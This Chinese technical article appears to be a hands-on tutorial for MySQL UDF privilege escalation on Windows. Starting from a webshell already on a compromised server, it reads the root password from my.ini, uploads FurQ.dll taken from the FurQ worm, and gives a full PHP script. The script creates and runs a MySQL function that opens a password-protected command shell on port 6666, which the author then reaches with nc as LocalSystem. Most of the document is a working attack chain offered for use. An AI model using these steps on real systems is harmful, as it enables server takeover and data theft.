【IT168 技术】前不久网上公开了一个MySQL Func的漏洞，讲的是使用MySQL创建一个自定义的函数，然后通过这个函数来攻击服务器。最早看到相关的报道是在o-otik上，但是公布的是针对Unix系统的Exploit，并且成功率也不是很高。而近期，国内有高手放出针对Win系统的相关文章，于是我马上找来与朋友一同研究。

　　其实我们早就能想到。当我们在对MSSQL\Oracle数据库进行攻击的时候，得到了最数据库中高权限的帐户，往往都是执行特殊的扩展过程或者函数来进行攻击的。比如MSSQL有Xp_cmdshell，Oracle可以通过Msvcrt。dll来创建一个特殊的函数。而我们却始终没有想到，作为流行的数据库软件之一的MySQL，也是可以进行函数的创建的。由此看来，MySQL的这个漏洞不应称为漏洞而仅仅是一个技术而已。

　　废话一堆过后，我们来了解一下怎么在MySQL里创建一个函数吧。这比如何利用重要许多，只要了解了原理，运用就能更加灵活，而且可以与其他思想融会贯通。

　　MySQL中创建一个函数的语句为：

　　Create Function FunctionName Returns [String|Integer|Real] Soname 'C：\function。dll'；

　　其中FunctionName指的是函数的名称，C：\Function。DLL指的是函数所调用的DLL，而函数名正是DLL中的函数名称。不过这里需要我们注意的是，如果我们需要MySQL可以在函数之中附带一个参数的话，那么就要符合UDF形式的程序编写规则，具体的可以查看MySQL手册的第14节：《为MySQL增加新函数》。而其中STRING，INTEGET，REAL是函数执行后所返回的值的形式。当然，我们大可不必遵循UDF形式的编写，其实如果我们的函数中使用一个我们要执行的代码，而不使用参数，一样可以达到攻击的效果，比如说System（"command。com"）等等。网上现在以此漏洞进行攻击的FurQ蠕虫就是一个不使用UDF格式的例子。但是注意，这个创建函数的语句必须要求我们所用的MySQL帐户有对mysql这个数据库的写权限，否则无法正常使用。

　　好了。了解了原理之后，我们来实战一下如何使用MySQL提升权限。

　　在这里我们已经通过各式各样的漏洞取得了一个服务器的WebShell，我这里演示的是angel的phpspy，因为PHP默认有连接MySQL的函数，而ASP这些需要使用附加的组件来进行连接，本身不具备条件的。

　　一般来说，在Win系统下面，很多软件都会在系统目录下创建一个叫my。ini的文件，其中包含了很敏感的MySQL信息。而如果我们攻克的主机没有非常好的权限设置的话，我们本身就具有对%windir%目录的浏览权限，所以可以非常容易的读取其中的信息。而且非常多的管理员通常是将root帐户与密码写进这个My。ini，所以一旦我们读到root用户的密码，就可以操纵整个MySQL数据库或者是服务器了。如图1。

　　得到MySQL的Root密码之后，我们需要上传我们的DLL文件，我这里使用的是从FurQ蠕虫中提取的FurQ。dll。执行这个FurQ。DLL中的Shell函数，系统将会在6666端口打开一个带密码的CMDShell，当然，密码我们已经知道，就是"FurQ"几个字符而已。不过我们现在还没有执行的条件。需要通过MySQL将这个函数创建到MySQL中去。

　　现在,我们用PHPSPY新建一个PHP文件.

　　输入以下的内容

　　$link=mysql_connect('127.0.0.1','root','root');

　　if (!$link) {

　　die('Could NOt Connect The Database!: ' . mysql_error());

　　};

　　echo "Good Boy.Connected!

　　";

　　//这里的root\root就是从my.ini中读取的用户和密码.

　　@mysql_select_db('mysql') or die ('use database mysql failed!');

　　echo "Yes You Did!

　　";

　　//这里选择使用MySQL数据库表.当然你也可以选择别的,如test.

　　$query="Create Function Shell RETURNS INTEGER SONAME 'd:\\wwwroot\\FurQ.dll';";

　　@$result = mysql_query($query, $link) or die ("Create Function Failed!");

　　echo "Goddess...Successed!

　　";

　　//这两句话是关键,执行MySQL的创建函数语句.将d:\wwwroot\furq.dll中的Shell函数创建进MySQL中.使得MySQL可以执行这个Shell函数.

　　$query="Select Shell();";

　　@$result = mysql_query($query, $link) or die ("Execute failed");

　　echo "Congratulations! Connect The Port 6666 Of This Server VS password:FurQ

　　";

　　//这一步是执行这个Shell函数,打开服务器的6666端口.

　　?>

　　再次执行,全部正常返回.如图2.那么现在,我们就可以使用nc连接服务器的6666端口,输入这个密码:FurQ.然后就返回CMDSHELL了..当然,由于继承的是MySQL的权限,而Win系统下MySQL默认以服务安装,也就是说,我们得到的Shell为LocalSystem权限,可以为所欲为了,不过不要做坏事哦.呵呵.